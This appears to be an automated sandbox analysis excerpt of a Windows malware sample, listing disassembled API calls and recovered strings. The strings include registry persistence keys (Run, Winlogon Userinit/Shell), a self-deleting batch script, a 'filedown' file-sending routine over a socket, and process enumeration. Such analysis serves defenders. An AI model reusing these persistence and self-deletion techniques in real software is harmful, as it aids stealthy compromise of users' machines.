??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@@Z ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ * 2 1211->1213 1214 406cdb-406d1b ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z * 2 ?close@?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAEXXZ ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ ShellExecuteA 1211->1214 1212->1211 1213->1214 1214->1209
                              APIs
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00415940,6A41AFB0,00000001), ref: 004069CA
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00415940,6A41AFB0,00000001), ref: 004069EF
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(explorer.exe,?,00000001,00415940,6A41AFB0,00000001), ref: 00406A1E
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(C:\WINDOWS\system32\userinit.exe,?,00000001,00415940,6A41AFB0,00000001), ref: 00406A4C
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00415940,6A41AFB0,00000001), ref: 00406A6C
                              • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00415940,6A41AFB0,00000001), ref: 00406A9F
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00406AA8
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(EXEpath,00000000,00000000), ref: 00406AC2
                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00406AE9
                                • Part of subcall function 0040524E: TerminateThread.KERNEL32(0040382C,00000000,00415918,00410668,00406D48,00415918,00410668,76F93520), ref: 00405263
                                • Part of subcall function 0040524E: UnhookWindowsHookEx.USER32(00000000), ref: 0040526C
                                • Part of subcall function 0040524E: TerminateThread.KERNEL32(0040380C,00000000), ref: 0040527C
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 00406AF3
                              • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 00406AFB
                              • getenv.MSVCRT ref: 00406B0F
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00000000), ref: 00406B1A
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 00406B25
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00406B30
                              • ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(00415918,00410668), ref: 00406B46
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000080), ref: 00406B62
                              • SetFileAttributesA.KERNEL32(00000000), ref: 00406B69
                              • SetFileAttributesA.KERNEL32(?,00000080), ref: 00406B77
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000010,00000001), ref: 00406B87
                              • ??0?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAE@PBDH@Z.MSVCP60(00000000), ref: 00406B94
                              • ?is_open@?$basic_ofstream@DU?$char_traits@D@std@@@std@@QBE_NXZ.MSVCP60 ref: 00406BA0
                              • ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z.MSVCP60(?,:Repeat), ref: 00406BC0
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,00410F2C), ref: 00406BD7
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,del ",00000000), ref: 00406BE7
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 00406BF4
                              • ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@@Z.MSVCP60(?,00000000,?,00000000), ref: 00406C01
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00406C0C
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00406C15
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00406C1E
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?," goto Repeat), ref: 00406C3D
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,if exist ",00000000), ref: 00406C4D
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 00406C5A
                              • ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@@Z.MSVCP60(?,00000000,?,00000000), ref: 00406C67
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00406C72
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00406C7B
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00406C84
                              • ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(00415918,00410668), ref: 00406C8C
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,@RD /Q ",00415918,00410F2C), ref: 00406CA7
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,00410F2C), ref: 00406CB4
                              • ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@@Z.MSVCP60(?,00000000,?,00000000,?,?,?,?,00410F2C), ref: 00406CC1
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,00410F2C), ref: 00406CCC
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,00410F2C), ref: 00406CD5
                              • ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z.MSVCP60(?,del %0 ), ref: 00406CE7
                              • ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z.MSVCP60(?,exit ), ref: 00406CF5
                              • ?close@?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00410F2C), ref: 00406D00
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00410668,00410668,00000000), ref: 00406D0D
                              • ShellExecuteA.SHELL32(00000000,open,00000000), ref: 00406D1B
                              • exit.MSVCRT ref: 00406D23
                              Strings
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: U?$char_traits@$V?$allocator@$D@std@@$D@2@@std@@$V?$basic_string@$V10@$??1?$basic_string@?c_str@?$basic_string@D@2@@0@$Hstd@@$??6std@@D@std@@@0@V?$basic_ostream@$??0?$basic_string@D@1@@$D@2@@0@@D@std@@@std@@FileV10@@$??9std@@AttributesTerminateThread$??0?$basic_ofstream@?close@?$basic_ofstream@?is_open@?$basic_ofstream@?size@?$basic_string@DeleteExecuteHookModuleNameShellUnhookWindowsexitgetenv
                              • String ID: " goto Repeat$:Repeat$@RD /Q "$C:\WINDOWS\system32\userinit.exe$EXEpath$Shell$Software\Microsoft\Windows NT\CurrentVersion\Winlogon\$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$Userinit$\uninstall.bat$del "$del %0 $exit $explorer.exe$if exist "$open
                              • API String ID: 2435849188-468332953
                              • Opcode ID: f7b9532450ad24e110554a0111ebd419dfb63accee5f6680732906e11875e649
                              • Instruction ID: 79bb7098ec12771f3f12c2aeb3a0bf44cec98225d0af6e33e903258e68a155bd
                              • Opcode Fuzzy Hash: f7b9532450ad24e110554a0111ebd419dfb63accee5f6680732906e11875e649
                              • Instruction Fuzzy Hash: A8A17172940209ABDB10ABA0DD4AFDE777DEB54304F1040BBF506B2191DAF85EC98B6D
                              Function 0040CA9B Relevance: 96.6, APIs: 53, Strings: 2, Instructions: 304COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1254 40ca9b-40cae4 call 4020e1 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ ??0?$basic_ifstream@DU?$char_traits@D@std@@@std@@QAE@PBDH@Z ?is_open@?$basic_ifstream@DU?$char_traits@D@std@@@std@@QBE_NXZ 1257 40caea-40cb21 ?tellg@?$basic_istream@DU?$char_traits@D@std@@@std@@QAE?AV?$fpos@H@2@XZ call 405288 1254->1257 1258 40cdeb-40ce53 ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z * 3 call 402198 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ * 3 1254->1258 1263 40cb22 call 402168 1257->1263 1264 40ce59 1258->1264 1265 40cb27-40cb46 call 40fd20 1263->1265 1266 40ce5b-40ce9c ??_D?$basic_ifstream@DU?$char_traits@D@std@@@std@@QAEXXZ call 4021d6 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ * 4 1264->1266 1271 40cdb4-40cdcd ?close@?$basic_ifstream@DU?$char_traits@D@std@@@std@@QAEXXZ call 4021c7 1265->1271 1272 40cb4c 1265->1272 1271->1266 1273 40cb57 1272->1273 1274 40cb4e-40cb51 1272->1274 1276 40cb5c-40cb61 1273->1276 1274->1271 1274->1273 1278 40cb70-40cd81 ??2@YAPAXI@Z ?seekg@?$basic_istream@DU?$char_traits@D@std@@@std@@QAEAAV12@JW4seekdir@ios_base@2@@Z ?read@?$basic_istream@DU?$char_traits@D@std@@@std@@QAEAAV12@PADH@Z ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z call 40ed35 * 2 ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z * 13 call 402198 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ * 16 1276->1278 1279 40cb63 1276->1279 1288 40cdd2-40cde9 call 4021c7 ?close@?$basic_ifstream@DU?$char_traits@D@std@@@std@@QAEXXZ 1278->1288 1289 40cd83-40cda3 call 40fc2c 1278->1289 1281 40cb65-40cb68 1279->1281 1282 40cb6a-40cb6d 1279->1282 1281->1278 1281->1282 1282->1278 1288->1264 1289->1276 1294 40cda9 1289->1294 1294->1271 1295 40cdab-40cdae 1294->1295 1295->1271 1295->1276
                              APIs
                                • Part of subcall function 004020E1: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,00415268,?,?,00403DDD,00000001), ref: 004020EF
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000024,00000001,00000001,00000000,6A41AFB0,6A41AFB0), ref: 0040CAC3
                              • ??0?$basic_ifstream@DU?$char_traits@D@std@@@std@@QAE@PBDH@Z.MSVCP60(00000000), ref: 0040CAD0
                              • ?is_open@?$basic_ifstream@DU?$char_traits@D@std@@@std@@QBE_NXZ.MSVCP60 ref: 0040CADC
                              • ?tellg@?$basic_istream@DU?$char_traits@D@std@@@std@@QAE?AV?$fpos@H@2@XZ.MSVCP60(?), ref: 0040CAF4
                                • Part of subcall function 00402168: connect.WS2_32(00415A30,00415A34,00000010), ref: 0040217E
                              • __aulldiv.LIBCMT ref: 0040CB38
                              • ??2@YAPAXI@Z.MSVCRT ref: 0040CB71
                              • ?seekg@?$basic_istream@DU?$char_traits@D@std@@@std@@QAEAAV12@JW4seekdir@ios_base@2@@Z.MSVCP60(0040C0FA,00000000,?,?,0000FDE8,00000000), ref: 0040CB85
                              • ?read@?$basic_istream@DU?$char_traits@D@std@@@std@@QAEAAV12@PADH@Z.MSVCP60(?,0000FDE8), ref: 0040CB95
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,0000FDE8,?), ref: 0040CBA6
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,filedown,00415268,?,00415268,00000001,00415268,?,00415268,00000000,00415268,00000000,00415268,?,00415268,00000000), ref: 0040CBF1
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,00415268,00000000), ref: 0040CC01
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,00415268,00000000), ref: 0040CC0E
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,00415268,00000000), ref: 0040CC1E
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,00415268,00000000), ref: 0040CC2E
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00415268), ref: 0040CC3E
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CC4E
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CC5B
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CC6B
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CC7B
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CC8B
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CC9B
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CCAB
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040CCD4
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040CCE0
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040CCEC
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040CCF8
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040CD04
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040CD0D
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040CD19
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040CD25
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040CD31
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040CD3D
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040CD46
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040CD52
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040CD5E
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040CD67
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040CD70
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040CD79
                                • Part of subcall function 0040FC2C: free.MSVCRT(?,00401C53,?,?,00401C39,00000000,?,00401BE7,?,?,00401B82,?,00000000,?,?,00401B4A), ref: 0040FC30
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CCB5
                                • Part of subcall function 00402198: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,00415A30,00415940,?,0040A446), ref: 004021A7
                                • Part of subcall function 00402198: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004021BA
                              • ?close@?$basic_ifstream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP60(?,?,0000FDE8,00000000), ref: 0040CDBA
                              • ?close@?$basic_ifstream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP60 ref: 0040CDE3
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,err_notopenfile,00415268,?,00415268,?), ref: 0040CE08
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,00415268,?), ref: 0040CE15
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,00415268,?), ref: 0040CE22
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,00415268,?), ref: 0040CE2C
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,00415268,?), ref: 0040CE41
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,00415268,?), ref: 0040CE4A
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,00415268,?), ref: 0040CE53
                              • ??_D?$basic_ifstream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,00415268,?), ref: 0040CE61
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,00415268,?), ref: 0040CE75
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,00415268,?), ref: 0040CE7E
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,00415268,?), ref: 0040CE87
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,00415268,?), ref: 0040CE90
                              Strings
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: U?$char_traits@$V?$allocator@$D@std@@$D@2@@std@@$??1?$basic_string@$D@2@@0@Hstd@@V?$basic_string@$V10@0@$D@std@@@std@@$??0?$basic_string@$?close@?$basic_ifstream@D@1@@V10@@V12@$??0?$basic_ifstream@??2@?c_str@?$basic_string@?is_open@?$basic_ifstream@?read@?$basic_istream@?seekg@?$basic_istream@?tellg@?$basic_istream@D?$basic_ifstream@H@2@V01@@V?$fpos@W4seekdir@ios_base@2@@__aulldivconnectfree
                              • String ID: err_notopenfile$filedown
                              • API String ID: 289020620-2089879270
                              • Opcode ID: d6b9cf1e4c66e6d906bea925c1d0ab002b0e340bedd8bcae2632eb85ff239588
                              • Instruction ID: 75517663f7f8035d4815827909ffde7696f2aa65873f957ae4acf3b8a579f94d
                              • Opcode Fuzzy Hash: d6b9cf1e4c66e6d906bea925c1d0ab002b0e340bedd8bcae2632eb85ff239588
                              • Instruction Fuzzy Hash: 12B13171D0011EDBDF14EBA0ED899DEBB78BF55304F1041B6F506A2091EA785E89CFA8
                              Function 00407E0B Relevance: 87.8, APIs: 46, Strings: 4, Instructions: 259processsynchronizationCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1296 407e0b-407e46 GetModuleFileNameA ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z 1297 407e4c-407e8d ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z CreateToolhelp32Snapshot Process32First Process32Next 1296->1297 1298 407fae-407fd2 call 40e5ce ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ call 40f0b5 1296->1298 1299 407e92-407e94 1297->1299 1313 407fd4-407fee ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI@Z 1298->1313 1314 40800a-40801f ??8std@@YA_NPBDABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@@Z 1298->1314 1301 407e9a-407eea ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ ?end@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ call 408667 ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z 1299->1301 1302 407f8f-407f9f CloseHandle ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z 1299->1302 1311 407f06-407f3b call 40f114 ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z 1301->1311 1312 407eec-407f04 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ Process32Next 1301->1312 1306 408034-408037 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ 1302->1306 1307 407fa5-407fa8 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ 1302->1307 1310 40803d-408062 ??0?$basic_ifstream@DU?$char_traits@D@std@@@std@@QAE@PBDH@Z ?is_open@?$basic_ifstream@DU?$char_traits@D@std@@@std@@QBE_NXZ 1306->1310 1307->1298 1315 408134-40813a ??_D?$basic_ifstream@DU?$char_traits@D@std@@@std@@QAEXXZ 1310->1315 1316 408068-4080e9 ?tellg@?$basic_istream@DU?$char_traits@D@std@@@std@@QAE?AV?$fpos@H@2@XZ call 405288 ??2@YAPAXI@Z ?seekg@?$basic_istream@DU?$char_traits@D@std@@@std@@QAEAAV12@JW4seekdir@ios_base@2@@Z call 405288 ?read@?$basic_istream@DU?$char_traits@D@std@@@std@@QAEAAV12@PADH@Z ?close@?$basic_ifstream@DU?$char_traits@D@std@@@std@@QAEXXZ CreateMutexA ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ call 40d477 1310->1316 1325 407f54-407f5f ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z 1311->1325 1326 407f3d-407f4f ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ * 2 1311->1326 1312->1299 1313->1314 1318 407ff0-408004 ?replace@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@IIPBD@Z 1313->1318 1314->1310 1319 408021 1314->1319 1320 408140-408149 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ 1315->1320 1335 4080eb-40810d ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ call 409046 1316->1335 1336 40810f-408112 CloseHandle 1316->1336 1318->1314 1319->1320 1323 40814b-40814f 1320->1323 1329 407f65-407f73 call 40f0df 1325->1329 1330 408026-40802f ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ 1325->1330 1326->1320 1329->1330 1337 407f79-407f89 ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ 1329->1337 1330->1307 1339 408114-408132 call 40fc2c ??_D?$basic_ifstream@DU?$char_traits@D@std@@@std@@QAEXXZ ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ 1335->1339 1336->1339 1337->1302 1339->1323
                              APIs
                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104,004157D0,00000000,00415940), ref: 00407E25
                              • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,00410560), ref: 00407E3A
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 00407E53
                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00407E5D
                              • Process32First.KERNEL32(?,?), ref: 00407E79
                              • Process32Next.KERNEL32(?,00000128), ref: 00407E88
